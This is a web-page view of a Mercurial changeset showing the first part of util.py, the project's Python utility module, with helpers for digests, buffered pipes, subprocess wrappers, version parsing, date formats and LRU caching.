##// END OF EJS Templates
util: use pycompat.bytestr() instead of str()...
Augie Fackler -
r36436:d26b0bed default
parent child Browse files
Show More
@@ -1,4009 +1,4009
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
184 184 def safehasattr(thing, attr):
185 185 return getattr(thing, attr, _notset) is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
197 197 def rapply(f, xs):
198 198 """Apply function recursively to every item preserving the data structure
199 199
200 200 >>> def f(x):
201 201 ... return 'f(%s)' % x
202 202 >>> rapply(f, None) is None
203 203 True
204 204 >>> rapply(f, 'a')
205 205 'f(a)'
206 206 >>> rapply(f, {'a'}) == {'f(a)'}
207 207 True
208 208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 210
211 211 >>> xs = [object()]
212 212 >>> rapply(pycompat.identity, xs) is xs
213 213 True
214 214 """
215 215 if f is pycompat.identity:
216 216 # fast path mainly for py2
217 217 return xs
218 218 return _rapply(f, xs)
219 219
220 220 def bytesinput(fin, fout, *args, **kwargs):
221 221 sin, sout = sys.stdin, sys.stdout
222 222 try:
223 223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 225 finally:
226 226 sys.stdin, sys.stdout = sin, sout
227 227
228 228 def bitsfrom(container):
229 229 bits = 0
230 230 for bit in container:
231 231 bits |= bit
232 232 return bits
233 233
234 234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 235 # to display anything to standard user so detect if we are running test and
236 236 # only use python deprecation warning in this case.
237 237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 238 if _dowarn:
239 239 # explicitly unfilter our warning for python 2.7
240 240 #
241 241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 248
249 249 def nouideprecwarn(msg, version, stacklevel=1):
250 250 """Issue an python native deprecation warning
251 251
252 252 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 253 """
254 254 if _dowarn:
255 255 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 256 " update your code.)") % version
257 257 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 258
259 259 DIGESTS = {
260 260 'md5': hashlib.md5,
261 261 'sha1': hashlib.sha1,
262 262 'sha512': hashlib.sha512,
263 263 }
264 264 # List of digest types from strongest to weakest
265 265 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 266
267 267 for k in DIGESTS_BY_STRENGTH:
268 268 assert k in DIGESTS
269 269
270 270 class digester(object):
271 271 """helper to compute digests.
272 272
273 273 This helper can be used to compute one or more digests given their name.
274 274
275 275 >>> d = digester([b'md5', b'sha1'])
276 276 >>> d.update(b'foo')
277 277 >>> [k for k in sorted(d)]
278 278 ['md5', 'sha1']
279 279 >>> d[b'md5']
280 280 'acbd18db4cc2f85cedef654fccc4a4d8'
281 281 >>> d[b'sha1']
282 282 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 283 >>> digester.preferred([b'md5', b'sha1'])
284 284 'sha1'
285 285 """
286 286
287 287 def __init__(self, digests, s=''):
288 288 self._hashes = {}
289 289 for k in digests:
290 290 if k not in DIGESTS:
291 291 raise Abort(_('unknown digest type: %s') % k)
292 292 self._hashes[k] = DIGESTS[k]()
293 293 if s:
294 294 self.update(s)
295 295
296 296 def update(self, data):
297 297 for h in self._hashes.values():
298 298 h.update(data)
299 299
300 300 def __getitem__(self, key):
301 301 if key not in DIGESTS:
302 302 raise Abort(_('unknown digest type: %s') % k)
303 303 return nodemod.hex(self._hashes[key].digest())
304 304
305 305 def __iter__(self):
306 306 return iter(self._hashes)
307 307
308 308 @staticmethod
309 309 def preferred(supported):
310 310 """returns the strongest digest type in both supported and DIGESTS."""
311 311
312 312 for k in DIGESTS_BY_STRENGTH:
313 313 if k in supported:
314 314 return k
315 315 return None
316 316
317 317 class digestchecker(object):
318 318 """file handle wrapper that additionally checks content against a given
319 319 size and digests.
320 320
321 321 d = digestchecker(fh, size, {'md5': '...'})
322 322
323 323 When multiple digests are given, all of them are validated.
324 324 """
325 325
326 326 def __init__(self, fh, size, digests):
327 327 self._fh = fh
328 328 self._size = size
329 329 self._got = 0
330 330 self._digests = dict(digests)
331 331 self._digester = digester(self._digests.keys())
332 332
333 333 def read(self, length=-1):
334 334 content = self._fh.read(length)
335 335 self._digester.update(content)
336 336 self._got += len(content)
337 337 return content
338 338
339 339 def validate(self):
340 340 if self._size != self._got:
341 341 raise Abort(_('size mismatch: expected %d, got %d') %
342 342 (self._size, self._got))
343 343 for k, v in self._digests.items():
344 344 if v != self._digester[k]:
345 345 # i18n: first parameter is a digest name
346 346 raise Abort(_('%s mismatch: expected %s, got %s') %
347 347 (k, v, self._digester[k]))
348 348
349 349 try:
350 350 buffer = buffer
351 351 except NameError:
352 352 def buffer(sliceable, offset=0, length=None):
353 353 if length is not None:
354 354 return memoryview(sliceable)[offset:offset + length]
355 355 return memoryview(sliceable)[offset:]
356 356
357 357 closefds = pycompat.isposix
358 358
359 359 _chunksize = 4096
360 360
361 361 class bufferedinputpipe(object):
362 362 """a manually buffered input pipe
363 363
364 364 Python will not let us use buffered IO and lazy reading with 'polling' at
365 365 the same time. We cannot probe the buffer state and select will not detect
366 366 that data are ready to read if they are already buffered.
367 367
368 368 This class let us work around that by implementing its own buffering
369 369 (allowing efficient readline) while offering a way to know if the buffer is
370 370 empty from the output (allowing collaboration of the buffer with polling).
371 371
372 372 This class lives in the 'util' module because it makes use of the 'os'
373 373 module from the python stdlib.
374 374 """
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True is any data is currently buffered
385 385
386 386 This will be used externally a pre-step for polling IO. If there is
387 387 already data then no polling should be set in place."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407 # this should not happen because both read and readline end with a
408 408 # _frombuffer call that collapse it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 def mmapread(fp):
456 456 try:
457 457 fd = getattr(fp, 'fileno', lambda: fp)()
458 458 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 459 except ValueError:
460 460 # Empty files cannot be mmapped, but mmapread should still work. Check
461 461 # if the file is empty, and if so, return an empty buffer.
462 462 if os.fstat(fd).st_size == 0:
463 463 return ''
464 464 raise
465 465
466 466 def popen2(cmd, env=None, newlines=False):
467 467 # Setting bufsize to -1 lets the system decide the buffer size.
468 468 # The default for bufsize is 0, meaning unbuffered. This leads to
469 469 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 470 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 471 close_fds=closefds,
472 472 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 473 universal_newlines=newlines,
474 474 env=env)
475 475 return p.stdin, p.stdout
476 476
477 477 def popen3(cmd, env=None, newlines=False):
478 478 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 479 return stdin, stdout, stderr
480 480
481 481 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 482 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 483 close_fds=closefds,
484 484 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 485 stderr=subprocess.PIPE,
486 486 universal_newlines=newlines,
487 487 env=env)
488 488 return p.stdin, p.stdout, p.stderr, p
489 489
490 490 def version():
491 491 """Return version information if available."""
492 492 try:
493 493 from . import __version__
494 494 return __version__.version
495 495 except ImportError:
496 496 return 'unknown'
497 497
498 498 def versiontuple(v=None, n=4):
499 499 """Parses a Mercurial version string into an N-tuple.
500 500
501 501 The version string to be parsed is specified with the ``v`` argument.
502 502 If it isn't defined, the current Mercurial version string will be parsed.
503 503
504 504 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 505 returned values:
506 506
507 507 >>> v = b'3.6.1+190-df9b73d2d444'
508 508 >>> versiontuple(v, 2)
509 509 (3, 6)
510 510 >>> versiontuple(v, 3)
511 511 (3, 6, 1)
512 512 >>> versiontuple(v, 4)
513 513 (3, 6, 1, '190-df9b73d2d444')
514 514
515 515 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 516 (3, 6, 1, '190-df9b73d2d444+20151118')
517 517
518 518 >>> v = b'3.6'
519 519 >>> versiontuple(v, 2)
520 520 (3, 6)
521 521 >>> versiontuple(v, 3)
522 522 (3, 6, None)
523 523 >>> versiontuple(v, 4)
524 524 (3, 6, None, None)
525 525
526 526 >>> v = b'3.9-rc'
527 527 >>> versiontuple(v, 2)
528 528 (3, 9)
529 529 >>> versiontuple(v, 3)
530 530 (3, 9, None)
531 531 >>> versiontuple(v, 4)
532 532 (3, 9, None, 'rc')
533 533
534 534 >>> v = b'3.9-rc+2-02a8fea4289b'
535 535 >>> versiontuple(v, 2)
536 536 (3, 9)
537 537 >>> versiontuple(v, 3)
538 538 (3, 9, None)
539 539 >>> versiontuple(v, 4)
540 540 (3, 9, None, 'rc+2-02a8fea4289b')
541 541 """
542 542 if not v:
543 543 v = version()
544 544 parts = remod.split('[\+-]', v, 1)
545 545 if len(parts) == 1:
546 546 vparts, extra = parts[0], None
547 547 else:
548 548 vparts, extra = parts
549 549
550 550 vints = []
551 551 for i in vparts.split('.'):
552 552 try:
553 553 vints.append(int(i))
554 554 except ValueError:
555 555 break
556 556 # (3, 6) -> (3, 6, None)
557 557 while len(vints) < 3:
558 558 vints.append(None)
559 559
560 560 if n == 2:
561 561 return (vints[0], vints[1])
562 562 if n == 3:
563 563 return (vints[0], vints[1], vints[2])
564 564 if n == 4:
565 565 return (vints[0], vints[1], vints[2], extra)
566 566
567 567 # used by parsedate
568 568 defaultdateformats = (
569 569 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 570 '%Y-%m-%dT%H:%M', # without seconds
571 571 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 572 '%Y-%m-%dT%H%M', # without seconds
573 573 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 574 '%Y-%m-%d %H:%M', # without seconds
575 575 '%Y-%m-%d %H%M%S', # without :
576 576 '%Y-%m-%d %H%M', # without seconds
577 577 '%Y-%m-%d %I:%M:%S%p',
578 578 '%Y-%m-%d %H:%M',
579 579 '%Y-%m-%d %I:%M%p',
580 580 '%Y-%m-%d',
581 581 '%m-%d',
582 582 '%m/%d',
583 583 '%m/%d/%y',
584 584 '%m/%d/%Y',
585 585 '%a %b %d %H:%M:%S %Y',
586 586 '%a %b %d %I:%M:%S%p %Y',
587 587 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 588 '%b %d %H:%M:%S %Y',
589 589 '%b %d %I:%M:%S%p %Y',
590 590 '%b %d %H:%M:%S',
591 591 '%b %d %I:%M:%S%p',
592 592 '%b %d %H:%M',
593 593 '%b %d %I:%M%p',
594 594 '%b %d %Y',
595 595 '%b %d',
596 596 '%H:%M:%S',
597 597 '%I:%M:%S%p',
598 598 '%H:%M',
599 599 '%I:%M%p',
600 600 )
601 601
602 602 extendeddateformats = defaultdateformats + (
603 603 "%Y",
604 604 "%Y-%m",
605 605 "%b",
606 606 "%b %Y",
607 607 )
608 608
609 609 def cachefunc(func):
610 610 '''cache the result of function calls'''
611 611 # XXX doesn't handle keywords args
612 612 if func.__code__.co_argcount == 0:
613 613 cache = []
614 614 def f():
615 615 if len(cache) == 0:
616 616 cache.append(func())
617 617 return cache[0]
618 618 return f
619 619 cache = {}
620 620 if func.__code__.co_argcount == 1:
621 621 # we gain a small amount of time because
622 622 # we don't need to pack/unpack the list
623 623 def f(arg):
624 624 if arg not in cache:
625 625 cache[arg] = func(arg)
626 626 return cache[arg]
627 627 else:
628 628 def f(*args):
629 629 if args not in cache:
630 630 cache[args] = func(*args)
631 631 return cache[args]
632 632
633 633 return f
634 634
635 635 class cow(object):
636 636 """helper class to make copy-on-write easier
637 637
638 638 Call preparewrite before doing any writes.
639 639 """
640 640
641 641 def preparewrite(self):
642 642 """call this before writes, return self or a copied new object"""
643 643 if getattr(self, '_copied', 0):
644 644 self._copied -= 1
645 645 return self.__class__(self)
646 646 return self
647 647
648 648 def copy(self):
649 649 """always do a cheap copy"""
650 650 self._copied = getattr(self, '_copied', 0) + 1
651 651 return self
652 652
653 653 class sortdict(collections.OrderedDict):
654 654 '''a simple sorted dictionary
655 655
656 656 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 657 >>> d2 = d1.copy()
658 658 >>> d2
659 659 sortdict([('a', 0), ('b', 1)])
660 660 >>> d2.update([(b'a', 2)])
661 661 >>> list(d2.keys()) # should still be in last-set order
662 662 ['b', 'a']
663 663 '''
664 664
665 665 def __setitem__(self, key, value):
666 666 if key in self:
667 667 del self[key]
668 668 super(sortdict, self).__setitem__(key, value)
669 669
670 670 if pycompat.ispypy:
671 671 # __setitem__() isn't called as of PyPy 5.8.0
672 672 def update(self, src):
673 673 if isinstance(src, dict):
674 674 src = src.iteritems()
675 675 for k, v in src:
676 676 self[k] = v
677 677
678 678 class cowdict(cow, dict):
679 679 """copy-on-write dict
680 680
681 681 Be sure to call d = d.preparewrite() before writing to d.
682 682
683 683 >>> a = cowdict()
684 684 >>> a is a.preparewrite()
685 685 True
686 686 >>> b = a.copy()
687 687 >>> b is a
688 688 True
689 689 >>> c = b.copy()
690 690 >>> c is a
691 691 True
692 692 >>> a = a.preparewrite()
693 693 >>> b is a
694 694 False
695 695 >>> a is a.preparewrite()
696 696 True
697 697 >>> c = c.preparewrite()
698 698 >>> b is c
699 699 False
700 700 >>> b is b.preparewrite()
701 701 True
702 702 """
703 703
704 704 class cowsortdict(cow, sortdict):
705 705 """copy-on-write sortdict
706 706
707 707 Be sure to call d = d.preparewrite() before writing to d.
708 708 """
709 709
710 710 class transactional(object):
711 711 """Base class for making a transactional type into a context manager."""
712 712 __metaclass__ = abc.ABCMeta
713 713
714 714 @abc.abstractmethod
715 715 def close(self):
716 716 """Successfully closes the transaction."""
717 717
718 718 @abc.abstractmethod
719 719 def release(self):
720 720 """Marks the end of the transaction.
721 721
722 722 If the transaction has not been closed, it will be aborted.
723 723 """
724 724
725 725 def __enter__(self):
726 726 return self
727 727
728 728 def __exit__(self, exc_type, exc_val, exc_tb):
729 729 try:
730 730 if exc_type is None:
731 731 self.close()
732 732 finally:
733 733 self.release()
734 734
735 735 @contextlib.contextmanager
736 736 def acceptintervention(tr=None):
737 737 """A context manager that closes the transaction on InterventionRequired
738 738
739 739 If no transaction was provided, this simply runs the body and returns
740 740 """
741 741 if not tr:
742 742 yield
743 743 return
744 744 try:
745 745 yield
746 746 tr.close()
747 747 except error.InterventionRequired:
748 748 tr.close()
749 749 raise
750 750 finally:
751 751 tr.release()
752 752
753 753 @contextlib.contextmanager
754 754 def nullcontextmanager():
755 755 yield
756 756
757 757 class _lrucachenode(object):
758 758 """A node in a doubly linked list.
759 759
760 760 Holds a reference to nodes on either side as well as a key-value
761 761 pair for the dictionary entry.
762 762 """
763 763 __slots__ = (u'next', u'prev', u'key', u'value')
764 764
765 765 def __init__(self):
766 766 self.next = None
767 767 self.prev = None
768 768
769 769 self.key = _notset
770 770 self.value = None
771 771
772 772 def markempty(self):
773 773 """Mark the node as emptied."""
774 774 self.key = _notset
775 775
776 776 class lrucachedict(object):
777 777 """Dict that caches most recent accesses and sets.
778 778
779 779 The dict consists of an actual backing dict - indexed by original
780 780 key - and a doubly linked circular list defining the order of entries in
781 781 the cache.
782 782
783 783 The head node is the newest entry in the cache. If the cache is full,
784 784 we recycle head.prev and make it the new head. Cache accesses result in
785 785 the node being moved to before the existing head and being marked as the
786 786 new head node.
787 787 """
788 788 def __init__(self, max):
789 789 self._cache = {}
790 790
791 791 self._head = head = _lrucachenode()
792 792 head.prev = head
793 793 head.next = head
794 794 self._size = 1
795 795 self._capacity = max
796 796
797 797 def __len__(self):
798 798 return len(self._cache)
799 799
800 800 def __contains__(self, k):
801 801 return k in self._cache
802 802
803 803 def __iter__(self):
804 804 # We don't have to iterate in cache order, but why not.
805 805 n = self._head
806 806 for i in range(len(self._cache)):
807 807 yield n.key
808 808 n = n.next
809 809
810 810 def __getitem__(self, k):
811 811 node = self._cache[k]
812 812 self._movetohead(node)
813 813 return node.value
814 814
815 815 def __setitem__(self, k, v):
816 816 node = self._cache.get(k)
817 817 # Replace existing value and mark as newest.
818 818 if node is not None:
819 819 node.value = v
820 820 self._movetohead(node)
821 821 return
822 822
823 823 if self._size < self._capacity:
824 824 node = self._addcapacity()
825 825 else:
826 826 # Grab the last/oldest item.
827 827 node = self._head.prev
828 828
829 829 # At capacity. Kill the old entry.
830 830 if node.key is not _notset:
831 831 del self._cache[node.key]
832 832
833 833 node.key = k
834 834 node.value = v
835 835 self._cache[k] = node
836 836 # And mark it as newest entry. No need to adjust order since it
837 837 # is already self._head.prev.
838 838 self._head = node
839 839
840 840 def __delitem__(self, k):
841 841 node = self._cache.pop(k)
842 842 node.markempty()
843 843
844 844 # Temporarily mark as newest item before re-adjusting head to make
845 845 # this node the oldest item.
846 846 self._movetohead(node)
847 847 self._head = node.next
848 848
849 849 # Additional dict methods.
850 850
851 851 def get(self, k, default=None):
852 852 try:
853 853 return self._cache[k].value
854 854 except KeyError:
855 855 return default
856 856
857 857 def clear(self):
858 858 n = self._head
859 859 while n.key is not _notset:
860 860 n.markempty()
861 861 n = n.next
862 862
863 863 self._cache.clear()
864 864
865 865 def copy(self):
866 866 result = lrucachedict(self._capacity)
867 867 n = self._head.prev
868 868 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 869 for i in range(len(self._cache)):
870 870 result[n.key] = n.value
871 871 n = n.prev
872 872 return result
873 873
874 874 def _movetohead(self, node):
875 875 """Mark a node as the newest, making it the new head.
876 876
877 877 When a node is accessed, it becomes the freshest entry in the LRU
878 878 list, which is denoted by self._head.
879 879
880 880 Visually, let's make ``N`` the new head node (* denotes head):
881 881
882 882 previous/oldest <-> head <-> next/next newest
883 883
884 884 ----<->--- A* ---<->-----
885 885 | |
886 886 E <-> D <-> N <-> C <-> B
887 887
888 888 To:
889 889
890 890 ----<->--- N* ---<->-----
891 891 | |
892 892 E <-> D <-> C <-> B <-> A
893 893
894 894 This requires the following moves:
895 895
896 896 C.next = D (node.prev.next = node.next)
897 897 D.prev = C (node.next.prev = node.prev)
898 898 E.next = N (head.prev.next = node)
899 899 N.prev = E (node.prev = head.prev)
900 900 N.next = A (node.next = head)
901 901 A.prev = N (head.prev = node)
902 902 """
903 903 head = self._head
904 904 # C.next = D
905 905 node.prev.next = node.next
906 906 # D.prev = C
907 907 node.next.prev = node.prev
908 908 # N.prev = E
909 909 node.prev = head.prev
910 910 # N.next = A
911 911 # It is tempting to do just "head" here, however if node is
912 912 # adjacent to head, this will do bad things.
913 913 node.next = head.prev.next
914 914 # E.next = N
915 915 node.next.prev = node
916 916 # A.prev = N
917 917 node.prev.next = node
918 918
919 919 self._head = node
920 920
921 921 def _addcapacity(self):
922 922 """Add a node to the circular linked list.
923 923
924 924 The new node is inserted before the head node.
925 925 """
926 926 head = self._head
927 927 node = _lrucachenode()
928 928 head.prev.next = node
929 929 node.prev = head.prev
930 930 node.next = head
931 931 head.prev = node
932 932 self._size += 1
933 933 return node
934 934
935 935 def lrucachefunc(func):
936 936 '''cache most recent results of function calls'''
937 937 cache = {}
938 938 order = collections.deque()
939 939 if func.__code__.co_argcount == 1:
940 940 def f(arg):
941 941 if arg not in cache:
942 942 if len(cache) > 20:
943 943 del cache[order.popleft()]
944 944 cache[arg] = func(arg)
945 945 else:
946 946 order.remove(arg)
947 947 order.append(arg)
948 948 return cache[arg]
949 949 else:
950 950 def f(*args):
951 951 if args not in cache:
952 952 if len(cache) > 20:
953 953 del cache[order.popleft()]
954 954 cache[args] = func(*args)
955 955 else:
956 956 order.remove(args)
957 957 order.append(args)
958 958 return cache[args]
959 959
960 960 return f
961 961
962 962 class propertycache(object):
963 963 def __init__(self, func):
964 964 self.func = func
965 965 self.name = func.__name__
966 966 def __get__(self, obj, type=None):
967 967 result = self.func(obj)
968 968 self.cachevalue(obj, result)
969 969 return result
970 970
971 971 def cachevalue(self, obj, value):
972 972 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 973 obj.__dict__[self.name] = value
974 974
975 975 def clearcachedproperty(obj, prop):
976 976 '''clear a cached property value, if one has been set'''
977 977 if prop in obj.__dict__:
978 978 del obj.__dict__[prop]
979 979
980 980 def pipefilter(s, cmd):
981 981 '''filter string S through command CMD, returning its output'''
982 982 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 983 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 984 pout, perr = p.communicate(s)
985 985 return pout
986 986
987 987 def tempfilter(s, cmd):
988 988 '''filter string S through a pair of temporary files with CMD.
989 989 CMD is used as a template to create the real command to be run,
990 990 with the strings INFILE and OUTFILE replaced by the real names of
991 991 the temporary files generated.'''
992 992 inname, outname = None, None
993 993 try:
994 994 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 995 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 996 fp.write(s)
997 997 fp.close()
998 998 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 999 os.close(outfd)
1000 1000 cmd = cmd.replace('INFILE', inname)
1001 1001 cmd = cmd.replace('OUTFILE', outname)
1002 1002 code = os.system(cmd)
1003 1003 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 1004 code = 0
1005 1005 if code:
1006 1006 raise Abort(_("command '%s' failed: %s") %
1007 1007 (cmd, explainexit(code)))
1008 1008 return readfile(outname)
1009 1009 finally:
1010 1010 try:
1011 1011 if inname:
1012 1012 os.unlink(inname)
1013 1013 except OSError:
1014 1014 pass
1015 1015 try:
1016 1016 if outname:
1017 1017 os.unlink(outname)
1018 1018 except OSError:
1019 1019 pass
1020 1020
1021 1021 filtertable = {
1022 1022 'tempfile:': tempfilter,
1023 1023 'pipe:': pipefilter,
1024 1024 }
1025 1025
1026 1026 def filter(s, cmd):
1027 1027 "filter a string through a command that transforms its input to its output"
1028 1028 for name, fn in filtertable.iteritems():
